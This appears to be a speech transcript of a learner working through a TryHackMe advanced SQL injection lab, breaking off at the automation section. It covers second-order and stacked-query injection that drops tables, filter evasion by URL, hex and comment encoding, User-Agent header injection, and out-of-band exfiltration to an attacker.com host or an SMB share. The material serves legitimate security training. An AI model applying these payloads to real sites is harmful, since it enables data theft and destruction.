I have just clicked the recording button and today we are going to learn advanced SQL injection. Learn advanced SQL techniques to exploit a web app. Introduction. I will just make an heading in my notebook. This video is not for any one to learn from this. I am just documenting my progress in this. SQL injection remains one of web application most severe and widespread security vulnerabilities. I have read this in the previous video and I have done SQL map in the previous video as well. I have completed SQL injection 1 in which we learned 3 types of SQL injections and top 10 OWASPs. I have solved Nmap. I know the basics of Nmap and I have used Nmap in many things, like I can use Nmap easily. Connecting to the machine. Before diving in, it's crucial to clearly understand the target machine's database version and operating system details. To achieve this, we can utilize Nmap, a powerful scanning tool. You can scan the machine IP. So just load this machine. The scan will provide valuable insight into open port running services that targets machine operating system. For those unfamiliar with Nmap, we recommend reviewing our comprehensive Nmap room. So starting off with Nmap A. So this is what we need to scan. This is the machine. This machine is using MySQL on Windows. Let's begin. So we just submit. What is the port on which MySQL is sending? So we need to run this command. So I'll just note that I am noting the port numbers that we need to go through. And I'll just copy the machine IP which we just got. So I'll open my Kali machine and map A T5. We can write T5. Then we can write P 3306, 339889, 445, 139. These are the port numbers. Dash P is for port 135 and we'll add the IP that we just copied. So we just started an Nmap scan. Actually we can just write 3306 in this answer also. Yes, I got that. But we'll see what we got through the Nmap scan. I think my Wi-Fi is not working correctly. So I'll just exit the Nmap scan. Let me show you how we can see it is 3306 TCP open MySQL. So we can say what port is open on MySQL. It is 3306. Quick recap. In the last SQL room, we explored the basic of SQL, understanding how attackers exploit in vulnerabilities in web application to manipulate SQL queries and access the unauthorized data. We covered essential techniques such as error-based and union-based SQL injection and blind SQL injection methods such as Boolean-based and time-based attacks. Here is the quick recap. Types of SQL. There are three types: in-band, out-of-band, inferential. In-band, error-based, union-based. Out-band, which we are going to learn, inferential, boolean-based, and time-based, which we have learned in the previous chapter. In-band SQL injection. This technique is considered the most common and straightforward type of SQL injection. So this is like basically we are revising the error-based SQL injection and union-based SQL injection. So what is error-based SQL injection? The attacker manipulates the SQL query to produce the error message from the database. So select all from users where id is equals to 1 and 1 equals convert int select version. If the database is turned in error, it reveals information about database. That is, the query is directly pasted into the database, which is very harmful for the database. Union-based SQL injection. The attacker uses union-based SQL injection to combine the result of two or more selective statements into a single result, thereby retrieving data from other tables. Select name, email, from where id is equals to 1, union all select username, password from admin. So union basically selects all username and password from admin. Inferior blind SQL. So there are two types of blind SQL: boolean based and time based. The attacker sends an SQL query to a database, forcing the application to return a different result based on true or false condition. Boolean, true and false condition. The attacker can infer whether the payload was true. Example: select star from user where id is equals to 1 and 1 equals to 1. True condition. Or where for condition, attacker can infer the result if the page content or behavior changes based on the condition. If it shows any result based on 1 equals 1 or 1 equals 2. Time-based blind SQL injection. The attacker sends an SQL query to a database which delays the response to a specific time. If the condition is true, by measuring the response time. We have tried this where we gave the response time 5 seconds and we guessed the password of user. Out of band SQL injection. Out of band SQL injection is new and we'll make notes of that. Out of band SQL injection is used whether when the attacker cannot use the same channel to launch the attack and gather result, or when the server response are unstable. So I am just noting this: when the attacker cannot use same channel or the server is unstable. When attacker cannot use same channel or response is unstable. This technique relies on the database server making an out-of-band request. Example: HTTP or DNS. To send the query result to the attacker, HTTP is normally based in out-of-band SQL injection to send the query result to attacker's server. We will discuss it in detail in this room. Each type of SQL injection technique has its advantages and challenges. Understanding these techniques is crucial for identifying and mitigating SQL injection vulnerabilities in the web application. In-band SQL injection is easy to exploit and detect, but noisy and can be easily monitored. In-band SQL, yes, it is noisy and can be easily measured by the error and union. If the code throws an error or if it shows the input, the tables from the database. So it is quite easy. In-band is easy to detect and exploit. Inferior blind SQL injection is more challenging to exploit. Inferior blind SQL injection, Boolean based and time based, are more complex to exploit. Out of band is less common and highly effective. It is less common. It is highly effective and less common. By mastering requires external server control and relies on database ability to make out of band request. Okay, by mastering these techniques, penetration testers can effectively identify and exploit SQL injection vulnerabilities, helping organizations secure their web application against critical threats. So by mastering these techniques, penetration tester can effectively identify exploit SQL injection. So out of the band SQL is, maybe we can find, I have learned about error based, union based, boolean based and time based before, but out of the band SQL is totally new for me and I don't know how it is used. We will learn together. So what type of SQL injection uses same communication channel for both injection and data retrieval? What type of SQL injection uses the same communication channel for both injection and data retrieval? Inferior. No, it is not inferior, it is in band. Okay, in band. In out of band SQL injection, which protocol is used? So we will note these questions. I always note the questions that are written at the end of the topic, as it gives overall summary about the topic. Same communication channel for both injection and data retrieval. Injection and data retrieval. It is in band. In out of band, what makes a query to attacker server? HTTP protection protocol. Second order SQL injection. Second order SQL injection, also known as stored SQL injection, exploits vulnerability where user supplied input is saved and subsequently used in the different part of application, possibly after initial processing. This type of SQL is more insidious because a malicious SQL code does not immediately result in SQL syntax error or obvious other obvious issues, making it harder to detect. Standard input validation techniques. The injection occurs upon the second use of the data when it is retrieved and used in SQL command. Hence, the name is second order. So we'll just write about second order in our notebook. Second order SQL injection, also known as stored. happens when user input is saved and used in other parts of application and used in other parts of application. The injection occurs upon second use. The injection occurs upon second use. Impact. The danger of the second order lies in its ability to bypass typical front-end defense like basic input validation and or sanitization, which only occurs at the point of initial data entry. Since the payload does not cause disruption during the first step, it can be overlooked until it's too late, making the attack particularly stealthy. Example, we will be using a book review application. The application allows the user to add book. In the web page, users are prompted to provide details about the book they wish to add to the database. You can access the app at this. We'll just copy, open our Kali machine. Oops, so my Wi-Fi is working correctly. I haven't copied this. Let me copy, then just paste. Oh, okay. We got this. Intro to PHP, Tim. The data collected includes SSN, book name, and author. Let's consider adding a book with the following detail: SSN, UI, book name, intro to PHP, add book. So they have added the book in our VMware also. And as we know, the second order is notably challenging to identify. Unlike the traditional SQL injection, which exploits in real-time processing vulnerabilities, it occurs when data previously stored in a database is later used in a SQL query. Detecting this vulnerability often requires understanding how data flows through the application and reused, necessitating a deep knowledge of backend operations. Analyzing of code. Consider the PHP code snippet in our application block as for adding books. So this is the code snippet that the website is using to add the book. SN post to con real escape string, post SN real escape string. So there is, I think, code uses real escape string method to escape the special characters. Yes, there is some sanitization. While this method can mitigate some risk of immediate SQL injection by escaping single quote and other SQL meta characters, it does not secure the application against second order SQL injection. The key issue here is the lack of parameterized query, which is essential for preventing injection attack. When data is inserted using real escape string method, it might include payload characters that don't cause immediate harm but can be activated upon subsequent retrieval and use in other SQL query. For instance, insert a book, intro to PHP, drop the table books. Might not affect the insert operation, but could have serious implications if the book name is later used in another SQL. Let's try adding another book. Test. Here we go. The SSN test is successfully inserted. in the database. The application includes the feature updated book through the interface update.php. The interface might display existing book details is in editable form field, retrieve based on earlier stored data, and then update them on user input. Okay, the pen tester would investigate whether the application reuses the data such as book name. Okay, so it is our job to investigate that the test, then single quotation is reused again, that previously stored in the potential taint. Then he would construct SQL queries for updating records. Then this potentially taint data without proper sanitation parameterization. By manipulating the data feature, the tester can see if the malicious payload added during the insertion phase gets executed during the update operation. If the application fails to employ proper security practices at this stage, earlier injected payload drop table books could be activated, leading to execution of SQL command like dropping a table. You can visit to update any book detail. Now let's review update.php code. The PHP script allows the user to update books within the bookstore through the query structure. We will analyze typical scenario where the penetration tester might look for SQL vulnerabilities, specifically focusing on how users input and handle the utilized SQL queries. If set post update unique ID, post update SN and unique ID, book name, post new book name, unique ID. The script begins by checking the request method is post. Okay, and if the update button was pressed, indicating that users intended to update books detail. Following this, the script retrieves user inputs directly from post. These variables SN, book name, new author are then used to construct SQL query for updating and the specified book details in the database. The script uses multi-query to execute multiple queries. It also inserts logs into logs table for analytic purpose, preparing the payload. We know that we can add or modify book details based on their SN. So yes, we can add modify book based on their SSN. The normal query for updating a book might look like update book set book name is equals to new book name, author is equals to new author, where SN is equals to 123 123. However, the SQL command could be manipulated if attacker inserts a special crafted SSN. For example, attacker uses the SSN value 12345, then colon semicolon update books set book name is equals to hack. When this value is used in the updated query, if it effectively ends the initial update command after 12345 and starts a new command, okay, this would change the book name of all entries in the book table to hacked. Oh, the initial payload insertion, a book is added, payload, okay, inserted as SSN. So we'll test this and we'll just see what happens. Just curious to know what happens. I haven't copied that code. This is what we need. So we have added a book successfully. Let's see what's next. Let's do this in initial payload. So is inserted as SSN. The semicolon will be used to terminate the SQL statement. Okay, the malicious SQL execution. After that, when the admin or any other user visits the URL and updates the book, Then insert the payload, breaks out of intended SQL command, structure and injection, a new command that updates all record in the book table. Let's visit the page. Update the book. Click on update button. The code will execute the statement in the backend. Okay. Commenting out the double dash is SQL symbol. Anything following will be ignored, effectively neutralizing any remaining parts of original SQL statement that could cause errors or reveal the attack. Once the above query is executed, it will change the name of the book to be hacked as shown below. Title of all books to be compromised. So we just need to take this, add book, This is what we got by doing the following. We'll submit that. What is the flag? Once you drop the table hello from the database. What is the flag? Once value. Once you drop the table hello from the database. So how to drop the table from the database is my question. So we'll just this is what we need. Might not affect an insert operation, but could have serious impact. Let's go. We'll just refresh this. Cancel. What was that? Add .php. We need to add a book name. Lol. Drop table. Hello. Add book. New book just added. Update. Just update this. Notation defined. So we got an error. update, we'll just visit this page, and I think this might work. Table bookstore dot books doesn't exist. Oh, I didn't know that we did that. So we need to just add hello here. We'll add a space hello. We'll add the book name lol. The table bookstore dot books doesn't exist. Let's just refresh this website. I think our query trying to get num rows of non-object in C exam HT document second add.php online. So I just messed up twice with the recording thing, and I need to improve in that for sure. I'll just let me take a second to brief you once again. So escape. I just need to do this. We got this. So the question was that what is the flag once you drop the table hello from the database? So we need to run this command to this code, malicious code, to drop the table hello. So we'll just add it here. We'll enter hello instead of books. So here is our hello, book name lol, author name lol. We'll just add the book. So, and we'll visit update.php. So here is our book that we need to update. We'll just update that. So undefined index intro into PHP. Maybe by adding another book we'll get the desired output. Update.php. I'm not getting the output. I'll just read the code that is given in that website. This is the code. Drop table hello. I'll just refer it from here. Drop table hello and add book. I will visit update.php once again, hoping that this might work. Update. So we got the flag table dropped, thm table dropped. So we'll just paste it into our Chrome. It's thm not Chrome. I just pasted the flag and we just completed this. Filter evasion techniques. So let's take the pen and paper again. Filter evasion techniques in advanced SQL injection. Evading filter is crucial for successfully exploiting vulnerabilities. Modern web applications often implement defensive measures to sanitize or block common attack patterns, and making simple SQL injection attempts ineffective. As pen tester, we must adapt using more sophisticated techniques bypass these filters. This section will cover the method including character encoding, no code SQL. So we'll just write character encoding heading and we'll start the this is character encoding. So we have noted that in our notebook, and handling scenarios where space cannot be used, we can effectively penetrate web application string and input validation and security control by understanding and applying these techniques. Character encoding. Character encoding involves converting special characters in SQL payload into encoded form that may bypass input filters. So here is URL encoding. Character encoding consists of URL encoding, converting one equals one to something like this. This encoding can help in input pass through web application filters be decoded by the database, which might not recognize it as malicious during initial process. URL encoding. So it is URL encoding, and we'll see hexadecimal encoding. Hexadecimal encoding is another effective technique for constructing SQL queries using hexadecimal values. For instance, the query select star from user where where name equals admin. Select star from users where name equals this. This is we are converting this into hexadecimal. So Unicode encoding. We'll just note hexadecimal encoding. Hexadecimal encoding. Select star from users where name equals admin. To we'll just get a string like this, hexadecimal string like this. Unicode encoding. Unicode encoding represent the character using Unicode escape sequence. For example, admin can be encoded as. This method can bypass filter that checks for specific ASCII characters, as the database will correctly process the encoded input. So we'll just note that Unicode encoding. Admin into something like this. 60061/U0064/U006D, something like this. Example. In this example, we explore how developer can implement basic filter to prevent SQL injection from using specific keywords and characters from user input. However, we will also see how attackers can bypass these defense by using character encoding like URL encoding. In the upcoming exercise, we will use the database. Okay, so this is the database that we are going to use. Let me check. I'm just curious about it. I'll just paste that here. Enter a book name. Okay, so here is the database. We'll see the code. Book name is equals to get book name, special characters or and union select string replace special characters book name. Okay, here's the PHP code that will not let us bypass this functionality. So here's the JavaScript code in the index.html page. Get sourcebook.php URL encoding book name. So this filters out our input. In the above example, the developer has implemented a basic defense mechanism to prevent SQL injection by removing SQL keywords such as or and union select, and filter filter uses the str replace function, which strips the keyword from the user input before they are included to SQL queries. The filtering approach aims to make it harder for the attackers to inject malicious SQL commands. Preparing the payload. Let's go through this process. Preparing an SQL injection payload step by step, showing how URL encoding can bypass basic defense. First, let's see what the normal input is. Intro to PHP, we get this. Intro to PHP, you have syntax error. Generate SQL query, and this is equal to 1. Example payload. So we are just doing URL encoding. Search button makes an Ajax local search.php. Or1 equals 1, where the following name intro to PHP ID is equal to 2, name intro to Python Lee, top setting. Now URL encoding payload using CyberChef. So we'll just use an external website for this. You can use CyberChef. I haven't learned CyberChef yet. We will learn this in next video for sure. I'm just noting that in my notion. Let me do that. This will take a minute. CyberChef. I have noted this. So the payload works because the URL encoding represent the special character and SQL keywords is in a way that bypasses the filter mechanism. When the server decodes the URL encoded input, its restore characters. Let me just open our Kali machine. Here it is. I just got this. What is the MySQL error code? Once an invalid query is entered with bad characters. Let me just check that. Intro to PHP. No. Lol. Search. "1064" is our error code. We'll just write that here. 1064. Enter. What is the name of the book? Where book ID is equals to 6. Let me just refer this again. Book where, okay, this is our query. Select star from book where book name is equals to intro.php. We'll just use URL encoder to encode this. We'll just copy that and paste it here. Search. No results found. What if we just paste it here? We found nothing. So let me just close this and with the standard payload. So this is what we need to load in that page. Let me just open that. Enter to PHP 1 is equal to 1, error code 1064, website bypass this. Now URL encode the payload this using cyberchef. Okay, so this is the URL of the website that we need to paste this code in. So I'll just encode we'll just copy that. I'll see the URL once again, search underscore book.php question mark book name equals our URL. Search just visit this error, you have an SQL error. Okay, no result found. We'll just read this once again. So when we enter into PHP we get an error. Into PHP 1 equals to 1 we get an error 1064. So what happens when we passed PHP script? URL encoding for single quote is this, URL encoding for space is this, for OR operator book name is equals to this. I just need to copy this. We'll just encode it once again, or maybe we'll just change the encoder this time. URL encoder online tool, encode it here. This is what we got. Enter book name, search. This is what we need to replace. Okay, so we got an error here. Generate SQL query, select star from books where book name is intro.php. So maybe what is the name of the book? ID 6. Equals 6. No result found. No result found. With the standard payload and let's visit the URL and you will see an error. So now URL encoded payload using cyberchef. And try to access an output dumping. So let me just open this. I'm loading a website. I'll show you after it loads. URL encode. Where is encode? encode. Here it is. This is what we got. I'll just paste this here and see what we get. So here it is. We got this. So I just used this website, which is like cyber chef on Google, and I just generated this string with the help of tryhackme input code, and I just entered that into the URL. We got the book name as Animal Series, author is Tom Hanks. We'll just remember that. We'll just open this. What is the name of the book? It is Animal Series. We'll submit this. Filter evasion techniques. So the above were quite easy. I think anyone can understand that. We as usual got stuck. Filter evasion techniques. I'll just write the name of the techniques and we'll make the prepared notes afterwards. Ending this recording using numerical values, not variable. One approach is to use numerical values or other data types that do not require quotes. For example, instead of injecting quotation 1 or 1 equals 1, an attacker can use or 1 equals 1 or in a context where, okay, so it is using this instead of this. So basically I'm noting this instead of I'm noting this instead of this. Here there is no single quotation or anything. Using SQL comments or comments. Admin for an instance can be transformed into this. Okay, so we'll write this also can be transformed into this. Using concat function, attackers can use SQL concat function, construct a very similar string like this. Okay, I don't know what this is, but we'll see afterwards. Using concat function, no space allowed. Comment to replace spaces. One common method to use SQL comments to replace spaces. For example, instead of select star from user where admin equals admin, select slash star star from user. Okay, so this is what we need to replace with this. SQL comments can replace space in the query, allowing the payload to go through the bypass filter tab, or so I will write no space allowed. Tab or new line character. Another approach is using /t or new line /n characters as substitute for spaces. Some filters might allow these characters, enabling the attacker to construct query like this /t or /n for the next line or something. This technique can bypass the filter, alternate characters, horizontal tab, line feed, from feed, carnage return, and non-breaking space. Practical example. So in this scenario, the endpoint is this. We'll see what is this. We'll just remove this and see. There is nothing on this side. We'll just close that. that returns user details based on the provided username. The developer has implemented the filter block in the SQL and space is sent to protect against SQL. Here PHP filtering added by the developer. Here's the PHP filtering and or space, so we can use for standard payload we'll use it will show an error. So this table is important. I'll take a screenshot of that. I'll just save this. In real environment, the query you apply by and the visibility of the filter keywords are not directly possible for the pen tester. It is important to understand SQL injection involves hit and trial approach. Yes, it does involve hit and trial approach. I have tried many things, as you have seen in this video. I tried everything that I could and got the flags without using anything else. What is the password of username attacker? So this is our string. We'll just copy that. We'll open this. No, let me just copy the URL that we are supposed to load. Where is the URL? Here it is. Let me just copy that. In our Kali machine, we'll remove the question mark and we'll get this string where we will replace something with admin t single quotation comma single quotation single quotation. What is the spelling of attacker? We'll see. It's double T. I never trust my instincts. Then we'll add A, then comma C, then comma K, then comma E, then comma, then R, and I'll just search that generate error code. Okay, so maybe I'll just see. I'll just verify where we are lagging. Username admin. So this is for admin admin, something like that. Hexadecimal. I will just add hexadecimal here. Let me hexadecimal decimal hexa. So this is not working in our case. I'll delete this. You have generated an error. Select star from user where. Okay. So this was the error that we just bypassed previously, and I just used cybersecurity for that. We added URL encoder. URL encode. We'll just replace this from this. We'll copy that, paste, run. It does not show any desired input. Let me just, spaces are banned, keywords like selected are banned, select keyword select is banned maybe, or else okay. Logical operators like and or are banned, so we'll use this. Keywords like select are banned. Select attacker from users, maybe we can replace this by that. Select star from users, we'll add this, copy, paste, we'll add single quotation attacker, we'll run this, so this shows same error code. What is the password and for the username attacker? Admin, I'm just trying this again. This might work because maybe I did an error. So this is what we need to enter. Oh shit. We will hack Google. Let me just remove the space from here. Let's add one. Enter. Your SQL syntax error. Check the manual that correspond to your MariaDB server version for the right syntax to use attacker. So what is the right syntax to use attacker? Look at ettcaker. Is it not found? Keywords like selector ban. I think select is not banned in this. So this shit, I just opened something else. No result found. Generate a SQL query. Select star user from where user select to. Attacker. Shit, I was just wondering here and there, and this was this easy. I'm just scratching my head. I don't know what to say, but I just learned something. Which of the following can be used if the select keyword is banned? Write the correct option only. We cannot bypass select keyword filter. D. SELECT. A can be used maybe. We see. So we can use this because PHP is not case sensitive, but SQL is not case sensitive, but PHP is case sensitive. So the coder might have not added this out of band SQL. Out of band SQL is an attack technique that pentesters writing or to exfiltrate data of malicious software. I think we have read this before also. What is the use of OOB? In the scenarios where direct response are sanitized or limited by the security, OOB channels enable attacker to exfiltrate data without immediate feedback from the server. For instance, security mechanisms like stored procedure, output encoding, and application level constraints can prevent direct responses, making traditional SQL injection ineffective. Out of the band SQL such as DNS, HTTP request allow the data on the external server controlled by the attacker circumventing these restrictions. As additionally, intrusion database system IDS firewalls monitor and log SQL query response to suspicious activity, but blocking direct response from this is particularly useful in network environments with limited direct connectivity because the attacker and database server between the attacker and database are such as the database is behind a firewall or in different network segment. Techniques in different database. So this is the technique for that MariaDB one. Select sensitive data from user into out file. An attacker could then access file via SMB, share on HTTP server running on the database server, thereby exfiltering the data through an alternate channel. Microsoft SQL Server, MS SQL. So this is the command that is used in MS SQL. I think this and this command shows same data. Alternate open row or bulk insert can be used to interact with external data source, facilitating data exfiltration through OOB channels. Oracle. In Oracle database, out-of-band SQL injection can be executed using UTL HTTP UTL file. UTL HTTP. Okay. UTL HTTP package can be used. Send SQL servers UTL HTTP request. Example of out of the band technique HTTP request. Select HTTP post attacker.com exfiltrate sensitive data from books. So this is the HTTP request exfiltration can be implemented on Windows, Linux, Ubuntu systems depending on the database support. Script UTF and enable HTTP request. DNS exfiltration. Attackers can use the SQL to regenerate the DNS request with encoded data, which is sent to malicious DNS server. As discussed above, MySQL does not natively support generating DNS requests through SQL commands alone. Attacker might use other means such as custom user-defined functions or system-level script to perform DNS lookup, SMB exfiltration. So I'm not noting these things. We'll just use that as needed to answer the flag, but uh, I'll make notes after making this video. I make notes. I refer the notes that I make in my book, cause I am more comfortable with that notes, and it is remote. I do not carry my laptop everywhere, or I cannot log in my THM account everywhere, so I carry my notebook. Whenever I need to revise some topic, I just revise that. And revision is very important, cause we can't remember this much data in one go. This was me just talking to you guys. SMB exfiltration. SMB exfiltration involves writing query result to SMB share on an external server. This technique is particularly effective in Windows. So this is the query that we will write in SMB to exfiltrate that. This is fully supported as Windows native SMB UNC path. Linux, while direct UNC path are more native to Windows. Linux using tools like SMB client or mounting the share local directory directly using an UNC path in SQL queries may require additional step or script to facilitate. Practical example. So I just load the attack box. Once again, we'll just terminate this machine. Got terminated. Start the machine once again. We'll just scroll down out of the band SQL. Where were we? Real life example, practical example. This is useful when direct responses from the database are restricted or monitored. Scenarios explanation. In this scenario, we would enable network share on attack box at attack box IP/logs. This share is accessible over network and allow file from other machine to be written to it. You may assume the scenario when you get a vulnerable system and want to private data. The attacker will leverage the share to exploit. Rather, when do you have a network share, we would start the attack box and execute the following command. Okay. Let me just start the attack the box once, cause I haven't used that for a while. Accessing desktop in 2 minutes. I will not do that. /logs. Navigate to im packet directory. CD options im packet. So where are this? Box /logs. So I need to enter. I think. I was just trying something. And my impact directory using cd/opt/impact/example. So we need to start attack the box. I'll just start that and wait for 2 minutes. Maybe till then we'll just read what we are supposed to do. It will take exactly 2 minutes. So where were we? Practical example. Navigate to im packet directory using this. We'll use this directory and navigate to im packet. Enter the command. We will enter this command to start the SMB server sharing TMP directory. You can access the contents of the network share by SMB client attack box /logs -u guest -n. This would allow you to connect to the network share, and then you can use the command ls to list all the commands. We have the same web application. You can access it. Here is the web application. So I think I wasn't supposed to open that file. Generated SQL query, visitor ID 1 team, visitor name team. The server code looks like this. Important consideration: file secure underscore file may be set. Secure file is set. MySQL will restrict file operations such as into out file to specific directory. With this means the attacker can only write files to this directory, limiting their ability to exfiltrate data to arbitrary locations when just whatever attack the box. Preparing the payload. To exploit this vulnerability, the attacker crafts payload into visitor name, attack box IP. So here we got the attack box IP. I will just open the terminal and we'll run the following command that we are supposed to: cd/opt/im packet /examples example. I'm holding a pen right now in my pocket. Enter the command. This is the command that we need to enter. So we got the same. Enter the command to start the SMB server sharing TMP directory. You can access the content network by entering this command. So we need to write this command: smb client /10.201.61.191 /ob/search underscore visitor dot php visitor name equals Tim. This was not the command that we were supposed to enter. /logs -u guest -n. Connection to this failed. ls. There are many commands. logs -u /logs -u guest -n. This will allow you to connect to the network share, then you can issue the command ls to list all commands. I just entered ls and we got many commands. I don't think we are going to use this commands. When the secure consideration preparing visitor name, select version out.txt. Out.txt. Let's dissect the payload. Close the original string within the SQL. Ends the first SQL statement. Executes a new write this to retrieve database. SMB. No. I don't need to SMB. I just need to enter SMB CLI ENT. No, it was correct. Ten point 201.61.191 just logs double backslash. Password for workgroup/root. What is the output of the output of S H? I think this command was running on its own and I just interrupted that. I'll just do the same in once again. I got some paste and I'll just enter this once again. Let's go. I entered this command. Address already in use. Okay. So I have a terminal opened. Config file passed. ls and address already in use. We'll run it once again. I'm getting the same error. Wait a second. Let me check the right that tryhackme techniques in different database, MySQL, MariaDB. Select star from user Microsoft. I think I just fucked up my OBS. Yes, I was reading this and I was not aware of what I was just doing. Let me run the command once again. I'll just close this terminal. Start a new one. CD. We will follow the below given steps once again until I don't get a flag. Packet examples. I was not writing anything in this. I don't. Let's hope this command runs this time because it showed error thrice. Okay, I got something. You can access the content by entering the command smb server smb client slash in the box guest n. Let me just copy this, paste. Let me enter. Okay, so I don't know how to use the attack the box, preparing the payload, out.txt attacker log slash out.txt, visitor name parameter, select version into out file. This is the payload that we are entering. This paste, enter, nothing will close. Let's dissect the above payload. Preparing the payload. I'll enter this and just wait for 5. No. And wait for 5 minutes. Config file parsed. I just got something here saying where can I see the I'll just run the above commands once again. This time it will show an error. So I'll just cd slash copy slash. After a few attempts I will just remember what directory in which the file is stored is. I will enter this code once again. I just saw something above, then it just disappeared. So it's roaming here. If it appears once again, I'm going to take a screenshot of that. Are we supposed to enter something here? I don't know. I am just a noob sitting on this machine in 1/logs. If I got this flag, I'll take a drink break for sure. So this code runs, but it takes time. I was just doing something and the code was active. So I am going to run this once again in the hope that it will run and show me something. Samples. I thought this code was of no use, but if it is given, then it is used. Let it. Hello, am I audible? Yes, this is me starting the recording again. So I have how to use SMB server, which is very important in this. So I'll just show you how I did it, and just got the first flag, and I know the way how to get the second flag. I will do that in front of you. So where is it? I just opened the directory in which my IAM packets were present, and just python 3 and the directory name. Then I just run this command on my attack the box. I'll just show you what here. Yes, here I just opened the machine. Here I just search for the SMB server commands and ran the SMB server commands for to connect to this website, and I pasted the crafted payload here, as you can see, and we just made a request to this. We got a remote connection, and now here as you can see, we got cat.out.txt, and we got this, the version name of the database. Copy selection. I'll just open my Chrome window and we'll just paste this. Submit. Base dir value, I'll show how it is done. So I will open the Kali machine. We'll go to this. I will edit it to out1.txt. We need to add it to out1, and instead of version we need to add base dir, and we'll just enter this, and ls cat out1.txt. we got this. We'll just copy this. Copy selection. Let me just paste it here. Other techniques. I'll just get my book. Other techniques: HTTP header injection. HTTP header injection carry user input, which might be used in SQL queries on the server side. If these inputs are not sanitized, it can lead to SQL injection. The technique involves manipulating HTTP headers like user agent wrapper or X forwarded for to inject SQL command. The server might log these headers or use them in SQL queries. For example, a malicious user agent header would look like user agent colon or 1 equals 1 semicolon then comment. If the server includes the user agent header in an SQL query, it can result SQL injection. In this example, a web application is present. We'll just visit the web application first. Let me copy this. I'll just open this, my Firefox, and we'll paste this into the search box. We'll visit the web application. I think we are not supposed to visit this. We'll just read that displays all the log entries and from the logs table. When user visits a web page, their browser sends a user agent header which identifies the browser operating system. The header is typically for logging purpose or to tailor content for specific browser. In our application, this user agent header is inserted into logs table and can be viewed the provider endpoint. But user agent, an attacker attempts and inject SQL code that combines user agent value is inserted into code. If the insertion is successful, a message is displayed. An error message will show details of the following error. Preparing the payload. Will prepare and inject SQL payload into the user agent header to demonstrate how SQL injection can be applied to HTTP header. Our target will be union select. So here we are preparing the payload for this. Curl h user agent exploit stored procedures. I think this is something different, XML and JSON. So we'll just try this out. User agent, I'll just read that once again. It shows that we should get the website. Yes, we got the website. New logs inserted. So here's a select from user where agent is used to go Firefox. Let's read what we have to do. New log successfully entered. User agent is used to. I think we need to use both suit for this. Boop. Let me check how we could do this. I'll try this once and proxy intercept is on. Open browser. We'll just visit this page. Here it is. We need to change this user agent to user agent is union username password. This and I think it should work. This. Let's open the site. Refresh this page. Yes, we got this. Okay, so what's next? New logs inserted successfully. We got a new log inserted successfully. Mark preparing the payload. So call HTTP agent. So we'll copy this. Open the terminal. Let me clear this out. We'll just paste it and enter. Here it is. There is something. There is someone. Bob at the 123. I don't think I will get anything. Bob at the 123 is important for us, I think, for getting the flag and that purpose. Let me scroll down. Exploiting the stored procedure, such as inserting, updating, or querying data. While stored procedure can help improving performance and ensure consistency, they can also be vulnerable to SQL injection if not properly handled. Just close this. Stored procedure are pre-compiled SQL statements that can be easily executed as single unit. They are stored in database and that can be called by application to perform specific tasks. Stored procedures can accept parameters which can make them flexible and powerful. However, if the parameters are not properly sanitized, they can introduce SQL injections. Consider a stored procedure designed to retrieve user data based on username. Here it is, create procedure, so we get username, varchar, declare SQL varchar, username. In this example, the stored procedure concatenates the username parameter and dynamic SQL query. This approach is one SQL injection because the input is not sent as XML JSON injection. If the application uses the value directly, SQL query like this, it could result in an injection. So we'll just copy this. What is the flag of the field in the books table where the book ID is equals to 1? The flag of the field in the table where book ID is equals to 1, we need to open this site. What we need to do is, what is the flag field in books table where book ID is equals to 1? The flag in the books table where book ID is equals to 1. Okay, so we need to get the admin access. I think we'll just open Bob, open the browser, we'll just copy this, open browser, paste. Let's get this user agent as the start from user password. We'll copy this and paste it into this and just forward this request to the website. We'll just refresh this, open the terminal, run the above command, and what we get is attacker Tesla Bob at the rate 123. So where is the login page of this website? What is the value of the flag field in book? We need to write what is the flag. I think we need to visit the login page / admin. There's nothing like this. Slash login HTTP agent HTTP logs. Okay. What is the flag? Let me see how it is done. Let me I do not have any answer for this. Inject a union statement. Open browser. I'll just copy this, paste it here, enter. I'll just edit this into our this one. Copy, paste, username, union select flag from book where book ID is equal to 1. Flag, and I don't need to add any enter in this. Book ID, flag is the password. Flag, and what was the third field? Books. So we'll just copy this from books, and we will forward this request to the browser. Refresh this. Let's call it. I think I did not get any. These both are same, I think. Yes, they are both same. And I'll just call it once again. It is showing same output. Let me just try it once again. Copy, browser, paste. Let's edit this, or else I can just close the bob and copy this side. Close this also. The Firefox window is closed. We'll open this again. We'll try curling it. We got the same output. I will just open Bob once again. Let's open Bob suite once again, and it shows pop-up. The forward is on like repeat mode. Proxy, open browser. We'll just add this, enter. What is this? Intercept is on, open browser, enter. We got this, and we need to edit this into close, machine expiring soon. We need to do it as soon as possible, or else we will get in a little bit of trouble. This book score ID. I think it was flag from book. Forward. Let's open the browser with slash, what was the HTTP agent, HTTP agent, refresh. Body class, there is another body class. I think it was present previously. Yes, there was a body class. So we're going to send the passport on the shadow class, front bold, bob, span, fund classic display, bob at the 123. I think we crafted this incorrectly. Let me just open the browser again. We'll copy that in the browser, paste it, and we'll just refer this. I think I didn't add it as when I was crafting the payload. Once again I will refresh this. I will do this once again. We got nothing extra. This is the same thing that we did for like 10 times. But when we were crafting the first payload, I think that was the time when we needed to be aware. Should be history. Edited. What is this? New logs inserted successfully. Row. I cannot see anything yet. Sometimes we roam around warp suit and we get many things. I think I have tried this like for 100 times. I have to edit this into intercept HTTP. We are getting Bob's password, but My machine got terminated. Let me just close this. What is this? Exclamation close. Put single. My machine got terminated, and I'm going to get a new machine and we'll do the same. I think we crafted a payload before our flag payload and it was on repeat mode. I don't know how, but it was not working for me actually. And the method clearly states that we need to edit user agent in this format in order to get the flag, but I'm not able to do that. We'll just wait for a minute or two and then we'll do that procedure again. Just check our machine is ready. Just copy the IP. Just close this. Paste clipboard. Oh shit! What is this? I think we need to. HTTP agent, not user agent. And now even this page takes a lot of time to load. What is the problem? We got this. We will just open the browser, paste this, intercept is on. Craft this union select and I'll just write book underscore ID comma flag from books and a semicolon. We'll just forward this. We'll refresh this page, copy this code and paste it here. Enter. Let's hope we got something different from this. That's gonna be from user. You need select username password from user, but the query that I built was different, I think. HTTP history. Oh, either I am not in a conscious mood, or I'm just doing blunders. I don't know what to say, but I do blunder a lot, more than usual. Here it is. THM hello. I think I could just guess the flag. It was easy. What file detected on the server side when extracting the user agent? What file detected on the server side? HTTP agent. This is the file, I think. Yeah, this is the file. Automation. SQL injection remains a common threat due to improper implementation of security measures and the complexity of different web frameworks. Automating identification and exploiting these vulnerabilities can be challenging, but several tools and techniques have been developed to help this streamline this progress. Major issues during identification of dynamic nature of SQL queries, variety of 